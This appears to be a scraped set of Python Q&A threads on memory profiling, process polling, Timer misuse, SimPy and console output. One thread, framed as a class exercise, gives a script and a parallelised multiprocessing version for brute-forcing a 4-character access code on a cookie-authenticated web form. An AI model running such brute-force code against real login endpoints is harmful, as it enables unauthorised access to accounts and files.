No module named mem_profile - python

I'm using this program to measure the time and memory used by two functions, to compare which one is better for processing a large amount of data. My understanding is that measuring memory usage requires the mem_profile module, but when I ran pip install mem_profile it gave me the error No module named mem_profile.
import mem_profile
import random
import time
names = ['Kiran','King','John','Corey']
majors = ['Math','Comps','Science']
print 'Memory (Before): {}Mb'.format(mem_profile.memory_usage_resource())
def people_list(num_people):
    results = []
    # iterate over a range; looping over the integer itself raises a TypeError
    for i in xrange(num_people):
        person = {
            'id':i,
            'name': random.choice(names),
            'major':random.choice(majors)
        }
        results.append(person)
    return results
def people_generator(num_people):
    for i in xrange(num_people):
        person = {
            'id':i,
            'name': random.choice(names),
            'major':random.choice(majors)
        }
        yield person
t1 = time.clock()
people = people_list(10000000)
t2 = time.clock()
# t1 = time.clock()
# people = people_generator(10000000)
# t2 = time.clock()
print 'Memory (After): {}Mb'.format(mem_profile.memory_usage_resource())
print 'Took {} Seconds'.format(t2-t1)
What has caused this error? And are there any alternative packages I could use instead?

1) First install the module:
pip install memory_profiler
2) Import it in your code like this:
import memory_profiler as mem_profile
3) Change the calls in your code from
mem_profile.memory_usage_psutil() (or mem_profile.memory_usage_resource()) to mem_profile.memory_usage()
4) Convert your print statements like this:
print('Memory (Before): ' + str(mem_profile.memory_usage()) + 'MB' )
print('Memory (After) : ' + str(mem_profile.memory_usage()) + 'MB')
print ('Took ' + str(t2-t1) + ' Seconds')
5) You will end up with something like this:
import memory_profiler as mem_profile
import random
import time
names = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']
majors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']
# print('Memory (Before): {}Mb '.format(mem_profile.memory_usage_psutil()))
print('Memory (Before): ' + str(mem_profile.memory_usage()) + 'MB' )
def people_list(num_people):
    result = []
    for i in range(num_people):
        person = {
            'id': i,
            'name': random.choice(names),
            'major': random.choice(majors)
        }
        result.append(person)
    return result
def people_generator(num_people):
    for i in range(num_people):
        person = {
            'id': i,
            'name': random.choice(names),
            'major': random.choice(majors)
        }
        yield person
# t1 = time.clock()
# people = people_list(1000000)
# t2 = time.clock()
t1 = time.clock()
people = people_generator(1000000)
t2 = time.clock()
# print 'Memory (After) : {}Mb'.format(mem_profile.memory_usage_psutil())
print('Memory (After) : ' + str(mem_profile.memory_usage()) + 'MB')
# print 'Took {} Seconds'.format(t2-t1)
print ('Took ' + str(t2-t1) + ' Seconds')
Now it works fine. I'm using Python 3.6 and it runs without any error.

I was going through the same tutorial and encountered the same problem. Upon further research, I discovered that the author of the tutorial used a package called memory_profiler, whose main file he renamed to mem_profile, and that is what he imported in the tutorial code.
Just go ahead and do pip install memory_profiler. Copy the package's main file into your working directory, rename it to mem_profile.py, and you should be fine. If you are on Windows, make sure you install the psutil package it depends on as well.
Hope this helps somebody.

Use this for calculating time:
import time
time_start = time.time()
#run your code
time_elapsed = (time.time() - time_start)
As referenced by the Python documentation:
time.time() → float
Return the time in seconds since the epoch as a floating point number.
The specific date of the epoch and the handling of leap seconds is
platform dependent. On Windows and most Unix systems, the epoch is
January 1, 1970, 00:00:00 (UTC) and leap seconds are not counted
towards the time in seconds since the epoch. This is commonly referred
to as Unix time. To find out what the epoch is on a given platform,
look at gmtime(0).
Note that even though the time is always returned as a floating point
number, not all systems provide time with a better precision than 1
second. While this function normally returns non-decreasing values, it
can return a lower value than a previous call if the system clock has
been set back between the two calls.
The number returned by time() may be converted into a more common time
format (i.e. year, month, day, hour, etc…) in UTC by passing it to
gmtime() function or in local time by passing it to the localtime()
function. In both cases a struct_time object is returned, from which
the components of the calendar date may be accessed as attributes.
Reference: https://docs.python.org/3/library/time.html#time.time
Use this for calculating memory:
import resource
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
Reference: http://docs.python.org/library/resource.html
If you are using Python 3.x, the timeit module is also available for timing:
Reference: https://docs.python.org/3/library/timeit.html
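If installing a third-party package is not an option, the standard library can cover both measurements. Here is a minimal sketch, assuming Python 3. It uses tracemalloc, which only tracks memory allocated by Python itself, so its numbers will differ from what memory_profiler or resource report. The helper name measure and the reduced item count are my own choices for illustration, not part of the tutorial:

```python
import random
import time
import tracemalloc

names = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']
majors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']


def people_list(num_people):
    # Builds every dict up front and keeps them all alive in one list.
    return [{'id': i, 'name': random.choice(names), 'major': random.choice(majors)}
            for i in range(num_people)]


def people_generator(num_people):
    # Produces one dict at a time; nothing is kept after it is consumed.
    for i in range(num_people):
        yield {'id': i, 'name': random.choice(names), 'major': random.choice(majors)}


def measure(func, num_people):
    """Hypothetical helper: return (seconds, peak_bytes) for consuming func(num_people)."""
    tracemalloc.start()
    start = time.perf_counter()
    count = 0
    for _ in func(num_people):  # consume every item so the generator really runs
        count += 1
    elapsed = time.perf_counter() - start
    _, peak = tracemalloc.get_traced_memory()  # returns (current, peak) in bytes
    tracemalloc.stop()
    return elapsed, peak


list_seconds, list_peak = measure(people_list, 20000)
gen_seconds, gen_peak = measure(people_generator, 20000)
print('list:      {:.3f} s, peak {:.2f} MiB'.format(list_seconds, list_peak / 2**20))
print('generator: {:.3f} s, peak {:.2f} MiB'.format(gen_seconds, gen_peak / 2**20))
```

Unlike the tutorial script, this consumes the generator, so the timing covers producing every item rather than just creating the generator object.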

Adding to Adebayo Ibro's answer above. Do the following :
In terminal, run $ pip install memory_profiler
In your script, replace import mem_profile with import memory_profiler as mem_profile
In your script, replace all mem_profile.memory_usage_resource() with mem_profile.memory_usage().
Hope this helps!

That module is handwritten (it is not a published Python package).
I got this from Corey Schafer's comment on his YouTube video.
Just save this code in a file named after the module (mem_profile.py):
from pympler import summary, muppy
import psutil
import resource
import os
import sys
def memory_usage_psutil():
    # return the memory usage in MB
    process = psutil.Process(os.getpid())
    # memory_info() replaces get_memory_info(), which newer psutil releases no longer provide
    mem = process.memory_info()[0] / float(2 ** 20)
    return mem
def memory_usage_resource():
    rusage_denom = 1024.
    if sys.platform == 'darwin':
        # ... it seems that in OSX the output is different units ...
        rusage_denom = rusage_denom * rusage_denom
    mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
    return mem

I just encountered the same problem. I solved it by installing memory_profiler ($ pip install -U memory_profiler), and then modifying the program as follows:
import memory_profiler
...
print('Memory (Before): {}Mb'.format(memory_profiler.memory_usage()))

A couple of Python 3.8 updates, since time.clock() was removed and print() has evolved.
Thanks everyone for this discussion, and definitely thanks to Corey Schafer for the great video.
import memory_profiler as mem_profile
import random
import time
names = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']
majors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']
print(f'Memory (Before): {mem_profile.memory_usage()}Mb')
def people_list(num_people):
    result = []
    for i in range(num_people):
        person = {
            'id': i,
            'name': random.choice(names),
            'major': random.choice(majors)
        }
        result.append(person)
    return result
def people_generator(num_people):
    for i in range(num_people):
        person = {
            'id': i,
            'name': random.choice(names),
            'major': random.choice(majors)
        }
        yield person
# t1 = time.process_time()
# people = people_list(1000000)
# t2 = time.process_time()
t1 = time.process_time()
people = people_generator(1000000)
t2 = time.process_time()
print(f'Memory (After): {mem_profile.memory_usage()}Mb')
print(f'Took {t2-t1} Seconds')

I went through the same tutorial.
The library name is memory_profiler.
To install it, you can use the following:
pip install -U memory_profiler
To import it:
import memory_profiler
Note: the library does not have a memory_usage_resource function,
but you can use memory_usage, which serves the same purpose.
Instead of the clock() function, use the time() function:
import memory_profiler
import random
import time
names=['John', 'Jane', 'Adam','Steve', 'Rick','George','Paul','Bill','Bob']
majors=['Math','Engineering','ComSic','Arts','Stuck Broker']
print ('Memory (Before): {} MB'.format(memory_profiler.memory_usage()))
#using list
def people_list(num_people):
    result = []
    for i in range(num_people):
        person={
            'id':i,
            'name':random.choice(names),
            'major':random.choice(majors)
        }
        result.append(person)
    return result
#using generators
def people_generator(num_people):
    for i in range(num_people):
        person={
            'id':i,
            'name':random.choice(names),
            'major':random.choice(majors)
        }
        yield person
# t1=time.time()
# people_list(1000000)
# t2=time.time()
t1=time.time()
people_generator(1000000)
t2=time.time()
print('Memory (After): {} MB'.format(memory_profiler.memory_usage()))
print ('Took {} seconds'.format(t2-t1))

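Much simpler with sys, if all you need is the size of a single object. Note that sys.getsizeof returns the shallow size of that one object in bytes, not the memory used by the whole process:
import sys
...
print ('Size of an empty list: {0} bytes'.format(sys.getsizeof([])))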

during the pip install mem_profile it gave me error No module named mem_profile.
By default, pip downloads packages from PyPI. No package named "mem_profile" exists on PyPI, so of course you get an error.
For timing blocks of code, the timeit module is what you want to use:
https://docs.python.org/library/timeit.html
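A short sketch of what that looks like, assuming Python 3. The two functions build_list and build_generator are stand-ins I made up to keep the example small; timeit.timeit with a callable and a number argument is the standard-library call:

```python
import timeit


def build_list(n):
    # Materialises all n values before anything is summed.
    return [i * 2 for i in range(n)]


def build_generator(n):
    # Yields the same values lazily, one at a time.
    return (i * 2 for i in range(n))


# number=100 runs each callable 100 times and returns the total time in seconds.
list_total = timeit.timeit(lambda: sum(build_list(1000)), number=100)
gen_total = timeit.timeit(lambda: sum(build_generator(1000)), number=100)
print('list:      {:.6f} s per call'.format(list_total / 100))
print('generator: {:.6f} s per call'.format(gen_total / 100))
```

Running the statement many times and averaging smooths out the noise you get from a single time.time() difference.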

Related

Check every X-milliseconds if process/application is running on Win

I want to check every 500 milliseconds whether a process/application is running (Windows 10). The code should be very fast and resource efficient!
My code is below, but how do I build in the 500 milliseconds? Is psutil the fastest and best way? Thank you.
import psutil
for p in psutil.process_iter(attrs=['pid', 'name']):
    if "excel.exe" in (p.info['name']).lower():
        print("Application is running", (p.info['name']).lower())
    else:
        print("Application is not Running")
How about doing it like this:
import psutil
import time
def running(pname):
    pname = pname.lower()
    for p in psutil.process_iter(attrs=['name']):
        if pname in p.info['name'].lower():
            print(f'{pname} is running')
            return # early return
    print(f'{pname} is not running')
while True:
    running('excel.exe')
    time.sleep(0.5)
First of all, psutil is a pretty good library. It has C bindings, so you won't get much faster than that.
import psutil
import time
def print_app():
    present = False
    for p in psutil.process_iter(attrs=['pid', 'name']):
        if "excel.exe" in (p.info['name']).lower():
            present = True
    print(f"Application is {'' if present else 'not '}present")
start_time = time.time()
print_app()
print("--- %s seconds ---" % (time.time() - start_time))
This tells you how long one check takes: 0.06 s for me.
If you want to run this every 0.5 s, you can simply add a time.sleep, because 0.5 >> 0.06.
You can then write this kind of code:
import psutil
import time
def print_app():
    present = False
    for p in psutil.process_iter(attrs=['pid', 'name']):
        if "excel.exe" in (p.info['name']).lower():
            present = True
    print(f"Application is {'' if present else 'not '}present")
while True:
    print_app()
    # sleep lives in the time module; a bare sleep(0.5) raises a NameError here
    time.sleep(0.5)
PS: I changed your code so that it checks whether the app is running without printing once per process. This makes the code faster because print takes a bit of time.
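One thing to keep in mind with a plain time.sleep(0.5) is that each cycle really lasts 0.5 s plus the time the check takes, so the schedule slowly drifts. If that matters, here is a rough sketch of a deadline-based loop using only the standard library. The names poll, fake_check and max_checks are hypothetical; fake_check stands in for the psutil scan so the example runs anywhere:

```python
import time


def poll(check, interval=0.5, max_checks=None):
    """Yield check() results, scheduling each run `interval` seconds after the last.

    max_checks is a hypothetical limit so the sketch can terminate;
    leave it as None to keep polling forever.
    """
    done = 0
    next_run = time.monotonic()
    while True:
        yield check()
        done += 1
        if max_checks is not None and done >= max_checks:
            return
        next_run += interval
        # Sleep only for the time left until the next scheduled run.
        time.sleep(max(0.0, next_run - time.monotonic()))


def fake_check():
    # Stand-in for the psutil process scan.
    return True


start = time.monotonic()
results = list(poll(fake_check, interval=0.05, max_checks=3))
elapsed = time.monotonic() - start
print(results, round(elapsed, 2))
```

time.monotonic is used instead of time.time so that a system clock adjustment cannot shorten or stretch the interval.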

Threading timer function not working within multiprocessing recursive script

I am a biologist and I am new to parallel processing. Some important background: some of my scripts can take up to 15 hours to execute. While the main function (in_command) is running, I am trying to run in parallel a function that takes snapshots of the hardware usage (CPU, RAM, etc.). The problem is that my recursive, timer-driven function (get_stats) executes correctly when run on its own, but as soon as I run it in parallel using multiprocessing the timer doesn't seem to work. The function runs about every second even though I have it on a 300-second timer. It does stop after the other script has finished, but I get far more snapshots than needed. I am also not in love with my current approach, so if there is a better way to do it I am willing to learn. I just can't have it impact the other script too much, hence the snapshot approach; I only need to know generally what is happening. Thanks!
import psutil
import platform
from datetime import datetime
import multiprocessing
import time
import os
from threading import Timer
import multiprocessing as mp
def get_size(bytes, suffix="B"):
    """
    Scale bytes to its proper format
    e.g:
        1253656 => '1.20MB'
        1253656678 => '1.17GB'
    """
    factor = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < factor:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= factor
def get_stats(switch, snapshot_dict, beg_time):
    df =snapshot_dict
    start_time = beg_time
    df['time'].append(time.time() - start_time)
    # Get core information
    df['total_cores'].append(psutil.cpu_count(logical=True))
    df['physical_cores'].append(psutil.cpu_count(logical=False))
    cpufreq = psutil.cpu_freq()
    # cpu frequency in Mhz
    df['max_frequency'].append(cpufreq.max)
    df['min_frequency'].append(cpufreq.min)
    df['current_frequency'].append(cpufreq.current)
    cpu_core = {}
    for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
        cpu_core[str(i)] = percentage
    df['cpu_core'].append(cpu_core)
    # get ram information
    svmem = psutil.virtual_memory()
    df['total_memory'].append(get_size(svmem.total))
    df['available_memory'].append(get_size(svmem.available))
    df['used_memory'].append(get_size(svmem.used))
    df['percent_memory'].append(svmem.percent)
    # swap memory if it exists
    swap = psutil.swap_memory()
    df['swap_total'].append(get_size(swap.total))
    df['swap_free'].append(get_size(swap.free))
    df['swap_used'].append(get_size(swap.used))
    df['swap_percentage'].append(swap.percent)
    print(df)
    #Call the code on a recursive function
    t = Timer(300, get_stats(switch,df,beg_time))
    t.start()
    print('Switch: ', switch.value)
    if switch.value == 1:
        t.cancel()
def in_command(file,switch):
    f = open(file,'r')
    f_lines = f.readlines()
    for line in f_lines:
        print(line)
        os.system(line)
    f.close()
    switch.value += 1
if __name__ == "__main__":
    manager= mp.Manager()
    df = {'time': [], 'total_cores': [], 'physical_cores': [], 'max_frequency': [],
          'min_frequency': [], 'current_frequency': [], 'cpu_core': [], 'total_memory': [],
          'available_memory': [], 'used_memory': [], 'percent_memory': [], 'swap_total': [],
          'swap_free': [], 'swap_used': [], 'swap_percentage': []}
    process_switch = manager.Value('i',0)
    start_time = time.time()
    p1 = mp.Process(target=get_stats, args = (process_switch, df, start_time))
    p2 = mp.Process(target=in_command, args=('text_command.txt', process_switch))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    print('finished')
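Thanks Michael. So, for everyone who might be reading this: the fix is not to call the function inside the Timer constructor, but to pass the function itself and supply its arguments separately. Writing get_stats(switch,df,beg_time) runs the function immediately and hands its return value to Timer, so the function recursed without ever waiting. That is why the snapshots arrived about every second, which is the time psutil.cpu_percent(interval=1) blocks.
Incorrect:
t = Timer(300, get_stats(switch,df,beg_time))
Correct:
t = Timer(5, function=get_stats,args=[switch,snapshot_dict,beg_time])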
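The difference is easy to see in isolation. A minimal sketch using only the standard library; snapshot and calls are made-up names for illustration, and the 0.1 s delay is just short enough to try out quickly:

```python
import threading

calls = []


def snapshot(label):
    # Record that the callback actually ran.
    calls.append(label)


# Wrong: snapshot('now') would run immediately, and Timer would receive
# its return value (None) instead of a function to call later.
# t = threading.Timer(0.1, snapshot('now'))

# Right: pass the function itself and supply its arguments separately.
t = threading.Timer(0.1, snapshot, args=['later'])
t.start()
before = list(calls)   # copy taken right after start(), before the timer fires
t.join()               # wait for the timer thread to finish
print(before, calls)
```

Timer only delays a single call, so for repeated snapshots the callback still has to schedule the next Timer itself, as get_stats does.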

monitor function name error using simpy

I'm very new to Python and am trying to use a SimPy script I found online to model queue times. I am getting a NameError when I use "Monitor", which I thought was part of SimPy. Is there somewhere else I should be importing Monitor from?
Thanks in advance for the help!
See below:
#!/usr/bin/env python
from __future__ import generators
import simpy
from multiprocessing import Queue, Process
from random import Random,expovariate,uniform
# MMC.py simulation of an M/M/c/FCFS/inft/infty queue
# 2004 Dec updated and simplified
# $Revision: 1.1.1.5 $ $Author: kgmuller $ $Date: 2006/02/02 13:35:45 $
"""Simulation of an M/M/c queue
Jobs arrive at random into a c-server queue with
exponential service-time distribution. Simulate to
determine the average number and the average time
in the system.
- c = Number of servers = 3
- rate = Arrival rate = 2.0
- stime = mean service time = 1.0
"""
__version__='\nModel: MMC queue'
class Generator(Process):
    """ generates Jobs at random """
    def execute(self,maxNumber,rate,stime):
        ##print "%7.4f %s starts"%(now(), self.name)
        for i in range(maxNumber):
            L = Job("Job "+`i`)
            activate(L,L.execute(stime),delay=0)
            yield hold,self,grv.expovariate(rate)
class Job(Process):
    """ Jobs request a gatekeeper and hold it for an exponential time """
    def execute(self,stime):
        global NoInSystem
        arrTime=now()
        self.trace("Hello World")
        NoInSystem +=1
        m.accum(NoInSystem)
        yield request,self,server
        self.trace("At last ")
        t = jrv.expovariate(1.0/stime)
        msT.tally(t)
        yield hold,self,t
        yield release,self,server
        NoInSystem -=1
        m.accum(NoInSystem)
        mT.tally(now()-arrTime)
        self.trace("Geronimo ")
    def trace(self,message):
        if TRACING:
            print "%7.4f %6s %10s (%2d)"%(now(),self.name,message,NoInSystem)
TRACING = 0
print __version__
c = 3
stime = 1.0
rate = 2.0
print "%2d servers, %6.4f arrival rate,%6.4f mean service time"%(c,rate,stime)
grv = Random(333555) # RV for Source
jrv = Random(777999) # RV for Job
NoInSystem = 0
m=Monitor()
mT=Monitor()
msT=Monitor()
server=Resource(c,name='Gatekeeper')
initialize()
g = Generator('gen')
activate(g,g.execute(maxNumber=10,rate=rate,stime=stime),delay=0)
simulate(until=3000.0)
print "Average number in the system is %6.4f"%(m.timeAverage(),)
print "Average time in the system is %6.4f"%(mT.mean(),)
print "Actual average service-time is %6.4f"%(msT.mean(),)
You are getting a NameError because Monitor has not been defined in your script. To use Monitor from simpy, either change import simpy to from simpy import Monitor, or write simpy.Monitor at each place where you currently call Monitor.
Ex:
#!/usr/bin/env python
from __future__ import generators
from simpy import Monitor
Or (lines 71-73):
m=simpy.Monitor()
mT=simpy.Monitor()
msT=simpy.Monitor()
Note that this assumes your installed SimPy still provides Monitor. The script is written against the old SimPy 1.x/2.x API, and as far as I know SimPy 3 and later no longer ship Monitor, so with a recent install the import itself may fail.

Slow brute force program in python

So here's the problem: our security teacher made a site that requires authentication and then asks for a code (4 characters) so that you can access a file. He told us to write a brute-force program in Python (any library we want) that can find the password. To do that, I first wanted to write a program that tries random combinations on that code field, just to get an idea of the time each request takes (I'm using the requests library), and the result was disappointing: each request takes around 8 seconds.
With some calculations: 36^4 = 1 679 616 possible combinations, which at 8 seconds each is 13 436 928 seconds, so my program would take around 155.52 days.
I would really appreciate it if anyone could help me make that faster. (He told us that it is possible to try around 1200 combinations per second.)
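For reference, the arithmetic can be checked in a few lines. This assumes the 36-character alphabet (lowercase letters plus digits) and the 4-character code from the script below, the measured 8 seconds per request, and the 1200 requests per second mentioned by the teacher:

```python
alphabet_size = 36      # 26 lowercase letters + 10 digits
code_length = 4
combinations = alphabet_size ** code_length

seconds_per_request = 8
total_seconds = combinations * seconds_per_request
days_sequential = total_seconds / 86400          # 86400 seconds per day

target_rate = 1200      # requests per second
minutes_at_target = combinations / target_rate / 60

print(combinations)                 # 1679616
print(total_seconds)                # 13436928
print(round(days_sequential, 2))    # 155.52
print(round(minutes_at_target, 1))  # 23.3
```

So the search space itself is small; the whole cost comes from doing the requests one after another.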
Here's my code:
import requests
import time
import random
def gen():
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    pw_length = 4
    mypw = ""
    for i in range(pw_length):
        next_index = random.randrange(len(alphabet))
        mypw = mypw + alphabet[next_index]
    return mypw
t0 = time.clock()
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
for i in range(0,5):
    t2 = time.clock()
    t3 = time.time()
    values = {'RECALL':gen()}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    print("##################################")
    print("cpu time for req ",i,":", time.clock()-t2)
    print("wall time for req ",i,":", time.time()-t3)
    print("##################################")
print("##################################")
print("Total cpu time:", time.clock()-t0)
print("Total wall time:", time.time()-t1)
Thank you
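One thing you could try is to use a Pool of workers to do multiple requests in parallel, passing one password to each worker. Something like:
import itertools
from multiprocessing import Pool
import requests
# alphabet and cookie are taken from the question
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
NUMBER_OF_PROCESSES = 8  # assumed value; tune it for your machine and the server
def pass_generator():
    # yields every 4-character combination exactly once, in order
    for pass_tuple in itertools.product(alphabet, repeat=4):
        yield ''.join(pass_tuple)
def check_password(password):
    values = {'RECALL': password}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    # Check response here.
if __name__ == '__main__':
    pool = Pool(processes=NUMBER_OF_PROCESSES)
    pool.map(check_password, pass_generator())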
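Enumerating the candidates systematically, instead of picking them at random as in the question, also guarantees that no code is tried twice. A small standalone sketch of just that part, with no network access; candidates is a name I picked for illustration:

```python
import itertools

alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"


def candidates(length=4):
    """Yield every string of `length` characters over `alphabet`, in order."""
    for chars in itertools.product(alphabet, repeat=length):
        yield ''.join(chars)


first_five = list(itertools.islice(candidates(), 5))
total = sum(1 for _ in candidates())
print(first_five)  # ['aaaa', 'aaab', 'aaac', 'aaad', 'aaae']
print(total)       # 1679616
```

Because candidates is a generator, the full list of 1 679 616 strings is never held in memory at once.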

How can I clear a line in console after using \r and printing some text?

For my current project, there are some pieces of code that are slow and which I can't make faster. To get some feedback on how much has been done / still has to be done, I've created a progress snippet which you can see below.
When you look at the last line
sys.stdout.write("\r100%" + " "*80 + "\n")
I use " "*80 to overwrite any remaining characters. Is there a better way to clear the line?
(If you find the error in the calculation of the remaining time, I'd also be happy. But that's not the question.)
Progress snippet
#!/usr/bin/env python
import time
import sys
import datetime
def some_slow_function():
    start_time = time.time()
    totalwork = 100
    for i in range(totalwork):
        # The slow part
        time.sleep(0.05)
        if i > 0:
            # Show how much work was done / how much work is remaining
            percentage_done = float(i)/totalwork
            current_running_time = time.time() - start_time
            remaining_seconds = current_running_time / percentage_done
            tmp = datetime.timedelta(seconds=remaining_seconds)
            sys.stdout.write("\r%0.2f%% (%s remaining) " %
                             (percentage_done*100, str(tmp)))
            sys.stdout.flush()
    sys.stdout.write("\r100%" + " "*80 + "\n")
    sys.stdout.flush()
if __name__ == '__main__':
    some_slow_function()
Consoles
I use ZSH most of the time, sometimes bash (and I am always on a Linux system)
Try using the ANSI/vt100 "erase to end of line" escape sequence:
sys.stdout.write("\r100%\033[K\n")
Demonstration:
import sys
import time
for i in range(4):
    sys.stdout.write("\r" + ("."*i*10))
    sys.stdout.flush()
    if i == 3:
        # \033[K erases the dots left over to the right of "Done"
        sys.stdout.write("\rDone\033[K\n")
    time.sleep(1.5)
Reference: https://en.wikipedia.org/wiki/ANSI_escape_code#CSI_sequences
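Putting the escape sequence into the progress snippet could look roughly like this. It is a sketch assuming Python 3 and an ANSI-capable terminal; progress_line and ERASE_TO_EOL are names I made up. It also addresses the remaining-time calculation mentioned in the question: elapsed / fraction estimates the total run time, so the elapsed time has to be subtracted to get what is left.

```python
import sys
import time

ERASE_TO_EOL = "\033[K"  # ANSI "erase from cursor to end of line"


def progress_line(done, total, elapsed):
    """Return a string that overwrites the current line with progress info."""
    fraction = done / total
    # elapsed / fraction estimates the total time; subtract elapsed for the rest.
    remaining = elapsed / fraction - elapsed
    return "\r%0.2f%% (%.1fs remaining)%s" % (fraction * 100, remaining, ERASE_TO_EOL)


start = time.time()
total = 20
for i in range(1, total + 1):
    time.sleep(0.01)  # stand-in for the slow part
    sys.stdout.write(progress_line(i, total, time.time() - start))
    sys.stdout.flush()
sys.stdout.write("\r100%" + ERASE_TO_EOL + "\n")
sys.stdout.flush()
```

Appending the erase sequence to every update means a shorter line never leaves stale characters behind, so the padding with spaces is no longer needed.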
This is what I use (Windows only, since msvcrt is a Windows module):
from msvcrt import putch, getch
def putvalue(value):
    for c in str(value):
        putch(c)
def overwrite(value):
    """ Used to overwrite the current line in the command prompt,
    useful when displaying percent or progress """
    putvalue('\r'+str(value))
from time import sleep
for x in xrange(101):
    overwrite("Testing Overwrite.........%s%% complete" % x)
    sleep(.05)
